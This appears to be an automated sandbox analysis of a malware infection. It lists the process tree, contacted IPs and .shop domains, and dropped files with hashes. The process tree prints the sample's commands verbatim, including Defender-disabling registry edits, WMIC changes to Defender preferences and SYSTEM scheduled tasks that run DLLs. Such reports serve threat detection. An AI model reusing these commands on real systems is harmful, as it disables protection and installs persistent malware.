reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\UhtGxG.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\zCzpeRf.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jiLwFdOzPPQiWLm"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\FcWcCnF.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\pALkSkC.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\mTHmWcc.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\sECwqfW.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 02:43:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\OyLtyjEk\dyVGbCr.dll\",#1 /wpZTdidafP 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QdCYtDviHOrgqJLgZ"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\OyLtyjEk\dyVGbCr.dll",#1 /wpZTdidafP 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\OyLtyjEk\dyVGbCr.dll",#1 /wpZTdidafP 385118
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4160 -ip 4160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2776 -ip 2776
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 2020
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| US | 8.8.8.8:53 | 70.47.45.147.in-addr.arpa | udp |
| RU | 185.215.113.67:40960 | tcp | |
| DE | 185.172.128.33:8970 | tcp | |
| US | 8.8.8.8:53 | roomabolishsnifftwk.shop | udp |
| US | 104.21.55.87:443 | roomabolishsnifftwk.shop | tcp |
| US | 8.8.8.8:53 | museumtespaceorsp.shop | udp |
| US | 104.21.32.80:443 | museumtespaceorsp.shop | tcp |
| US | 8.8.8.8:53 | 67.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | buttockdecarderwiso.shop | udp |
| US | 172.67.218.187:443 | buttockdecarderwiso.shop | tcp |
| US | 8.8.8.8:53 | averageaattractiionsl.shop | udp |
| US | 172.67.220.163:443 | averageaattractiionsl.shop | tcp |
| US | 8.8.8.8:53 | 187.218.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.55.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | femininiespywageg.shop | udp |
| US | 172.67.141.63:443 | femininiespywageg.shop | tcp |
| US | 8.8.8.8:53 | detailbaconroollyws.shop | udp |
| US | 172.67.193.11:443 | detailbaconroollyws.shop | tcp |
| US | 8.8.8.8:53 | employhabragaomlsp.shop | udp |
| US | 104.21.85.81:443 | employhabragaomlsp.shop | tcp |
| US | 8.8.8.8:53 | horsedwollfedrwos.shop | udp |
| US | 8.8.8.8:53 | 163.220.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.193.67.172.in-addr.arpa | udp |
| US | 104.21.74.118:443 | horsedwollfedrwos.shop | tcp |
| US | 8.8.8.8:53 | stalfbaclcalorieeis.shop | udp |
| US | 8.8.8.8:53 | patternapplauderw.shop | udp |
| US | 104.21.3.197:443 | stalfbaclcalorieeis.shop | tcp |
| US | 104.21.55.248:443 | patternapplauderw.shop | tcp |
| US | 8.8.8.8:53 | 81.85.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.74.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.55.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | civilianurinedtsraov.shop | udp |
| US | 8.8.8.8:53 | understanndtytonyguw.shop | udp |
| US | 104.21.49.245:443 | civilianurinedtsraov.shop | tcp |
| DE | 23.88.106.134:80 | 23.88.106.134 | tcp |
| US | 172.67.203.201:443 | understanndtytonyguw.shop | tcp |
| US | 8.8.8.8:53 | considerrycurrentyws.shop | udp |
| US | 172.67.170.57:443 | considerrycurrentyws.shop | tcp |
| US | 8.8.8.8:53 | 245.49.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.106.88.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.170.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | messtimetabledkolvk.shop | udp |
| US | 172.67.158.30:443 | messtimetabledkolvk.shop | tcp |
| US | 8.8.8.8:53 | deprivedrinkyfaiir.shop | udp |
| US | 104.21.25.251:443 | deprivedrinkyfaiir.shop | tcp |
| RU | 5.42.65.67:48396 | tcp | |
| US | 8.8.8.8:53 | 30.158.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.25.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | relaxtionflouwerwi.shop | udp |
| US | 104.21.76.64:443 | relaxtionflouwerwi.shop | tcp |
| US | 8.8.8.8:53 | 64.76.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| DE | 185.172.128.82:80 | 185.172.128.82 | tcp |
| US | 8.8.8.8:53 | gigapub.ma | udp |
| US | 8.8.8.8:53 | f000.backblazeb2.com | udp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 104.153.233.177:443 | f000.backblazeb2.com | tcp |
| FR | 51.75.247.100:443 | gigapub.ma | tcp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.66.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.247.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | 177.233.153.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.127.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.42.77.54.in-addr.arpa | udp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| US | 8.8.8.8:53 | 141.179.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.174.76.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iili.io | udp |
| GB | 85.192.56.26:80 | 85.192.56.26 | tcp |
| US | 104.21.235.69:443 | iili.io | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| US | 8.8.8.8:53 | 69.235.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.249.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | 26.56.192.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.75.67.172.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | iili.io | udp |
| US | 104.21.235.70:443 | iili.io | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| N/A | 99.86.249.120:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 70.235.21.104.in-addr.arpa | udp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| RU | 45.142.122.192:47398 | tcp | |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | 192.122.142.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api3.check-data.xyz | udp |
| US | 44.237.26.169:80 | api3.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 169.26.237.44.in-addr.arpa | udp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp |
Files
memory/4508-0-0x0000000000B60000-0x0000000001034000-memory.dmp
memory/4508-1-0x0000000077864000-0x0000000077866000-memory.dmp
memory/4508-2-0x0000000000B61000-0x0000000000B8F000-memory.dmp
memory/4508-3-0x0000000000B60000-0x0000000001034000-memory.dmp
memory/4508-5-0x0000000000B60000-0x0000000001034000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
| MD5 | eac6fdde5df959773d9f807516197192 |
| SHA1 | f189d4baabb2e96f819c38a1e2f2de5ad9b037cd |
| SHA256 | 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22 |
| SHA512 | 8ef7a8bb9be5a1a85c01ef747928ef9ad7db2b6ebc379e4d1c61f8a81642ed2b7df09aafcfb25be38dbe5d307453e8bb770905e37a1a62e8406370e28e16fdaf |
memory/4508-17-0x0000000000B60000-0x0000000001034000-memory.dmp
memory/2068-18-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/2068-19-0x0000000000F11000-0x0000000000F3F000-memory.dmp
memory/2068-20-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/2068-21-0x0000000000F10000-0x00000000013E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
| MD5 | 208bd37e8ead92ed1b933239fb3c7079 |
| SHA1 | 941191eed14fce000cfedbae9acfcb8761eb3492 |
| SHA256 | e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494 |
| SHA512 | a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715 |
memory/1428-37-0x0000000000750000-0x0000000000751000-memory.dmp
memory/4548-38-0x0000000000400000-0x0000000000592000-memory.dmp
memory/1428-40-0x0000000000750000-0x0000000000751000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
| MD5 | 84bf36993bdd61d216e83fe391fcc7fd |
| SHA1 | e023212e847a54328aaea05fbe41eb4828855ce6 |
| SHA256 | 8e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa |
| SHA512 | bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf |
memory/5116-78-0x00000000006F0000-0x0000000000742000-memory.dmp
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
| MD5 | 816df4ac8c796b73a28159a0b17369b6 |
| SHA1 | db8bbb6f73fab9875de4aaa489c03665d2611558 |
| SHA256 | 7843255bc50ddda8c651f51347313daf07e53a745d39cc61d708c6e7d79b3647 |
| SHA512 | 7dd155346acf611ffaf6399408f6409146fd724d7d382c7e143e3921e3d109563c314a0367a378b0965e427470f36bf6d70e1586d695a266f34aebd789965285 |
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
| MD5 | 15a7cae61788e4718d3c33abb7be6436 |
| SHA1 | 62dac3a5d50c93c51f2ab4a5ebf78837dc7d3a9f |
| SHA256 | bed71147aa297d95d2e2c67352fc06f7f631af3b7871ea148638ae66fc41e200 |
| SHA512 | 5b3e3028523e95452be169bdfb966cd03ea5dbe34b7b98cf7482ca91b8317a0f4de224751d5a530ec23e72cbd6cc8e414d2d3726fefee9c30feab69dc348fa45 |
memory/5116-81-0x00000000055A0000-0x0000000005B44000-memory.dmp
memory/756-83-0x00000000003F0000-0x0000000000442000-memory.dmp
memory/5116-82-0x0000000005090000-0x0000000005122000-memory.dmp
memory/5116-84-0x0000000005030000-0x000000000503A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tmp47E6.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
memory/5116-102-0x0000000005C50000-0x0000000005CC6000-memory.dmp
memory/436-103-0x0000000000C50000-0x0000000000CBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
| MD5 | c4ffab152141150528716daa608d5b92 |
| SHA1 | a48d3aecc0e986b6c4369b9d4cfffb08b53aed89 |
| SHA256 | c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475 |
| SHA512 | a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9 |
memory/5116-112-0x0000000006450000-0x000000000646E000-memory.dmp
memory/5116-122-0x0000000006760000-0x0000000006772000-memory.dmp
memory/5116-121-0x0000000006820000-0x000000000692A000-memory.dmp
memory/5116-120-0x0000000006B90000-0x00000000071A8000-memory.dmp
memory/5116-136-0x00000000067C0000-0x00000000067FC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1162180587-977231257-2194346871-1000\76b53b3ec448f7ccdda2063b15d2bfc3_44d43ff8-91cd-4ca7-92c9-6495b4f546fa
| MD5 | 0b9e016110ac8ac65b9f1bc13dd9b9c2 |
| SHA1 | 1c49109c59290b1ad4f258960e3f0041cb5171a3 |
| SHA256 | 05ade0bfd24b5701fba8d810274bfc077d4472cead31a21c4649e696cae71a19 |
| SHA512 | 637716e8113f3e12e6900e78d23cf6b1a90898731e1704aa289800817e36e0cf194239a365d7e6f6c2f44a0b86f1e00a1af464a2d33153e7dc17f6e0d1ab46cf |
memory/5116-141-0x0000000006930000-0x000000000697C000-memory.dmp
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | f8a0def113850915e7506b860e1e4f2f |
| SHA1 | 93eb04a546c34d0399d3125e13d28bb786510880 |
| SHA256 | 4d6775a7ad5aeaf9dec20010ca8e3f6b870295e4d6c3208a63e9425b827f9fee |
| SHA512 | 9b74272240a57138e63ce3ed2d3863e7b5a0f8c07b2d7026834df78565d10f4754e2f8727de8145ad7dee6d1a7aac3e06880e35fec3f087a7c0ef1b3ee06c92f |
C:\Users\Public\Desktop\Microsoft Edge.lnk
| MD5 | b67aca591bb2fc7653bfb3fc59ed79dd |
| SHA1 | 606f6ce864f3293db8f90ee0ea4c56f6f1af6c92 |
| SHA256 | 5e76dde77b215f5f9cfab6cc9464ab746158d470293eb01cd0a66f2fbb849b07 |
| SHA512 | 9b7c11fef9e2355d83bc513fb45dc4193ee4a12247fdd91efd71807808101bee713550fa5e1b42f131efac2569ea24e2f473b2812278b8127767bbdc29753d1e |
memory/3224-148-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/2972-149-0x0000000000400000-0x0000000000455000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
| MD5 | 0b7e08a8268a6d413a322ff62d389bf9 |
| SHA1 | e04b849cc01779fe256744ad31562aca833a82c1 |
| SHA256 | d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65 |
| SHA512 | 3d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4 |
memory/4508-167-0x0000000000390000-0x0000000000391000-memory.dmp
memory/696-166-0x0000000000400000-0x0000000000459000-memory.dmp
memory/696-168-0x0000000000400000-0x0000000000459000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
| MD5 | 05b11e7b711b4aaa512029ffcb529b5a |
| SHA1 | a8074cf8a13f21617632951e008cdfdace73bb83 |
| SHA256 | 2aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa |
| SHA512 | dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff |
memory/4592-187-0x0000000000400000-0x000000000063B000-memory.dmp
memory/4592-185-0x0000000000400000-0x000000000063B000-memory.dmp
memory/4928-186-0x0000000000960000-0x0000000000961000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
| MD5 | a991da123f34074f2ee8ea0d798990f9 |
| SHA1 | 3988195503348626e8f9185747a216c8e7839130 |
| SHA256 | fd42e618223f510d694c5fb2f8ecbc1a88cabf003bcf20da6227da30a1352a0f |
| SHA512 | 1f958cacb820833ea8b5ac2d9ca7f596625e688f8f6b6e3ab6f27aa3b25b8c9e5b57e1eed532a8d2519da6c1b41492eb8ac930fc25eaf2be2f344c2f32e81a49 |
memory/3508-206-0x0000013100F20000-0x0000013100F5C000-memory.dmp
memory/5116-207-0x0000000006A70000-0x0000000006AD6000-memory.dmp
memory/756-212-0x0000000006980000-0x00000000069D0000-memory.dmp
memory/436-213-0x000000001E790000-0x000000001E89A000-memory.dmp
memory/436-214-0x000000001C740000-0x000000001C752000-memory.dmp
memory/436-215-0x000000001C990000-0x000000001C9CC000-memory.dmp
memory/2068-216-0x0000000000F10000-0x00000000013E4000-memory.dmp
memory/436-217-0x000000001EC20000-0x000000001EC96000-memory.dmp
memory/436-218-0x000000001C720000-0x000000001C73E000-memory.dmp
memory/3508-219-0x00000131012E0000-0x00000131012E6000-memory.dmp
memory/3508-220-0x000001311B3B0000-0x000001311B40C000-memory.dmp
memory/436-221-0x000000001F2B0000-0x000000001F472000-memory.dmp
memory/436-222-0x000000001F9B0000-0x000000001FED8000-memory.dmp
memory/3256-223-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vjwb2040.zpm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2544-229-0x0000016BFF6D0000-0x0000016BFF6F2000-memory.dmp
C:\Users\Admin\Pictures\2aKqYO6fwr80z0GppLieE2sl.exe
| MD5 | 77f762f953163d7639dff697104e1470 |
| SHA1 | ade9fff9ffc2d587d50c636c28e4cd8dd99548d3 |
| SHA256 | d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea |
| SHA512 | d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499 |
C:\Users\Admin\Pictures\ThdYwKZvKmIzn3rj3JtxK05A.exe
| MD5 | cd4acedefa9ab5c7dccac667f91cef13 |
| SHA1 | bff5ce910f75aeae37583a63828a00ae5f02c4e7 |
| SHA256 | dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c |
| SHA512 | 06fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1 |
C:\Users\Admin\AppData\Local\Temp\{2C491E4E-251B-4b47-ABE8-A20C191A01F3}.tmp\360P2SP.dll
| MD5 | fc1796add9491ee757e74e65cedd6ae7 |
| SHA1 | 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812 |
| SHA256 | bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60 |
| SHA512 | 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d |
C:\Users\Admin\Pictures\SJLhmzYCwLH1f34kc7MVy0ZE.exe
| MD5 | ef65292d26c79999f9cd88fc202e257e |
| SHA1 | bb1022e9d3d345f14db1f7e431d4d63259fa3ac2 |
| SHA256 | 4bd44fc79eff569312def70fb850c7f168e84d039f4d1d23b7a4927338476222 |
| SHA512 | 7df62adbecb10d5894741e85ee99df64949eb8a8300e352a5e9d8253b65ea58971f10d10a1f7a8dc0b99bfc87ab8ee511499a6b740cc996f8ec64e312209d02a |
C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe
| MD5 | 0e0938f8a7266056305bfedda7e1e78a |
| SHA1 | 2b4aa419957936fa6c6a2afbadb6bc30c1c4895d |
